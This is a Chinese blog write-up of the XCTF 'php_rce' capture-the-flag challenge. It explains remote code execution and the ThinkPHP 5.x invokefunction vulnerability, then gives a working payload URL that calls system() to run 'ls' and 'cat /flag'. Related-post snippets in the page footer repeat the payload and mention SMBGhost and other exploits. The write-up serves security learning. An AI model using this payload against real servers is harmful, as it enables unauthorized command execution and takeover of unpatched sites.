攻防世界web进阶区--php_rce write up

最新推荐文章于 2024-04-09 19:30:11 发布
最新推荐文章于 2024-04-09 19:30:11 发布
阅读量3.6k 收藏
点赞数 1
分类专栏: web 文章标签: web 经验分享 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62851980/article/details/124166126
版权

打开靶机:

这道题没有什么难点,重点在于RCE的认识和thinkphp的漏洞。

那RCE是什么嘞:

RCE:远程代码执行漏洞
远程命令/代码执行漏洞,简称RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。RCE分为远程命令执行ping和远程代码执行evel。

漏洞产生的根本原因
服务器没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令。

也就是说,如果thinkphp真的存在rce,我们就能通过各种指令来获取他的一些信息,包括flag的获取。

而thinkphp通过百度可知,他确实存在远程代码执行漏洞:

ThinkPHP 5.0<5.0.23&5.1<5.1.31版本在没有开启强制路由的情况下可能存在远程代码执行漏洞。攻击者通过该漏洞可能完全控制Web服务器。 

解法:网页只显示了tinkphp,我们已知thinkphp是存在漏洞的,直接Github搜索thinkphp漏洞(https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection),发现:

 

在url后面的:

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=xxxxx(命令)

就是远程代码执行漏洞啦,输入命令就返回什么 。

输入ls命令查看全部:

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls

 

所以构建payload:

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag

cat命令是查看,我们直接查看flag就能看到flag:

 

今天不用学物理吧
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2021-01-31
m0_54628962的博客
01-31 1030
20210131CTF题目练习 1.web1:view_source 打开网页 因右键无法使用,想要查看源代码可以使用Ctrl+u来查看,或可以在地址栏前面加上view_source:来查看 即可得到flag值,如图 2.web2:robots 打开网页,在网址后加上robots.txt,查看文件里的内容 将文件中flag部分粘贴复制至网址后得到flag 3.Misc题目:this_is_flag 题目答案即题目描述后for example后面的内容 4.crypto题目:base64 点击附
Joomla 3.4.6 RCE复现及分析
Ms08067安全实验室
06-05 654
作者:whojoe(MS08067安全实验室SRST TEAM成员)# 前言前几天看了下PHP 反序列化字符逃逸学习,有大佬简化了一下joomla3.4.6rce的代码,今天来自己分析学...
Exploit-Nagios-XI-5.7.X_Remote-Code-Execution-RCE-Authenticated:Nagios XI 5.7.X-远程执行代码RCE(已认证)
04-10
利用Nagios-XI-5.7.X远程代码执行RCE身份验证 Nagios XI 5.7.X-远程执行代码RCE(已认证)
TDOA_RCE:通达OA综合利用工具
03-03
工具说明 通达OA综合利用工具_20210224 集成POC如下 任意用户登录POC:4个SQL注入POC:2个后台文件上传POC:3个本地文件包含POC:2个前台文件上传POC(非WEB目录):1个任意文件删除POC:1个 工具面板截图 工具利用流程 1.优先利用本地文件包含漏洞 原因是本地文件包含漏洞,配合前台文件上传可以直接getshell,无需获取有效Cookie 2.如果本地文件包含漏洞利用失败,则可以利用任意用户登录漏洞与SQL注入漏洞 这两个突破的利用方式集成在了“获取Cookie”按钮上共计6个POC,其中任意一个POC利用成功的都会自动停止,并自动填充有效的Cookie到工具上获取有效的Cookie后,可以选择后台文件发布一键利用如目标存在弱密码,可手动填充有效Cookie后配合文件上传一键利用 3.特定版本v11.6存在任意文件删除漏洞的利用 当目标为v11.6版本时,
攻防世界php_rce (ThinkPHP5)
最新发布
2302_79800344的博客
04-09 588
【代码】【攻防世界php_rce (ThinkPHP5漏洞)
远程POC-SMBGhost_RCE_PoC.zip
06-09
CVE-2020-0796漏洞公告显示,SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。攻击者利用该漏洞无须权限即可实现远程代码执行,受黑客攻击的目标系统只需开机在线即可能被入侵。
攻防世界-web-php_rce
wuh2333的博客
05-15 490
攻防世界web安全,rce
攻防世界——php_rce
qq_60905276的博客
11-11 1700
我看不懂,查一下资料发现ThinkPHP V5曾经出现一个漏洞,来学习一下。 ThinkPHP 5漏洞简介 ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本,推荐尽快更新到最新版本。 看得出来程序没经过控制器进行过滤,所以可以用/来控制程序。 搞不懂这个漏洞是怎么搞出来的,借用一下大神的答案。 ?
攻防世界php_rce
weixin_52268949的博客
01-20 880
php_rce 进入题目提示为ThinkPHP V5 遇到这种题我们一般去找一下框架的rce漏洞即可,搜索到这样一篇文章 https://www.freebuf.com/articles/web/289860.html 然后我们直接使用这里面的payload ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami 成功rce 接下来就是找fl
攻防世界 | php_rce
weixin_47982238的博客
10-19 267
进入网页后是这样的,现根据题目rce了解了主要是远程命令代码执行漏洞,就去GitHub上搜索了一下think PHPV5 不成想真被我搜到了,如下图: 点击进去之后,发现了许多远程代码执行漏洞 不妨先来一个试试: http://220.249.52.133:41485/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]..
攻防世界web新手关之php_rce
weixin_45746283的博客
11-16 612
攻防世界web新手关之php_rce
CVE-2020-0796_SMBGhost_RCE_exp.zip
06-05
CVE-2020-0796_SMBGhost_RCE_exp.zip CVE-2020-0796 exp
Mybb-XSS_SQL_RCE-POC:Mybb将CVE-2021-27890和CVE-2021-27889关联到RCE POC
03-25
Mybb-XSS_SQL_RCE-POC Mybb将CVE-2021-27890和CVE-2021-27889关联到RCE POC 使用前: 这里有两个文件:1.js和Attack_listen.py 您应该修改这两个文件: 1.js: 修改mybb论坛网址和攻击网址: var bashurl = '...
AWD攻防比赛指导手册
渗透测试研究中心
11-30 2016
0# 什么是AWD 0.1# AWD赛制介绍 「 攻防模式 | AWD (Attack With Defense) 」 是 CTF比赛 「CTF Capture The Flag」 几种主要的比赛模式之一,该模式常见于线下赛。 在该模式中,每个队伍都拥有一个相同的初始环境 ( 我们称其为 GameBox ),该环境通常运行着一些特定的服务或应用程序,而这些服务通常包含一些安全漏洞。参赛队伍需要挖...
攻防世界 ThinkPHP V5(漏洞解析及利用)
热门推荐
Haowill的博客
04-12 1万+
ThinkPHP V5 攻防世界这道题,考察的是thinkphp V5的漏洞,接下来我详细介绍一下thinkphp V5这个漏洞。 ThinkPHP 5漏洞简介 ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5....
Web安全领域的探索之命令执行(RCE
bluemoon_0的博客
01-15 100
Web安全领域的探索之命令执行(RCE
服务器端模板注入(SSTI)详解
键盘的起始页
01-11 1570
模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,利用模板引擎来生成前端的html代码,模板引擎会提供一套生成html代码的程序,然后只需要获取用户的数据,然后放到渲染函数里,然后生成模板+用户数据的前端html页面,然后反馈给浏览器,呈现在用户面前。 模板引擎也会提供沙箱机制来进行漏洞防范,但是可以用沙箱逃逸技术来进行绕过。
一次简单的渗透测试,快来测测P站有没有漏洞吧!
jklbnm12的博客
07-16 607
前言 下午闲来无事,拿自己站玩玩,也算是一次比较完备地漏洞挖掘。文末插入福利 信息搜集 在fofa上找到一个后台的站。 一个普通的后台,弱口令,sql注入没打进去。 从错误路由中得知框架是tp的 这个版本是存在RCE漏洞的 直接嗦 设置了open_basedir和disable_function 也是比较头疼的。 整理思路 我们可以知道php版本是 7.1 和 开了 FPM服务的,以及tp的版本是5.0.15。 可以尝试打FPM未授权,或者利用 PHP7.1 版本存在的 JSON seriali
攻防世界-Web-php_rce
uh_eng的博客
08-05 590
0x01 打开题目,很明显是ThinkPHP5框架,这里就联想到ThinkPHP5的著名漏洞,再加上题目中的RCE(远程代码执行)解题思路基本就有了。 关于ThinkPHP5的这个漏洞,可以参考:ThinkPHP5 RCE漏洞重现及分析 0x02 使用payload验证一下漏洞: /index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值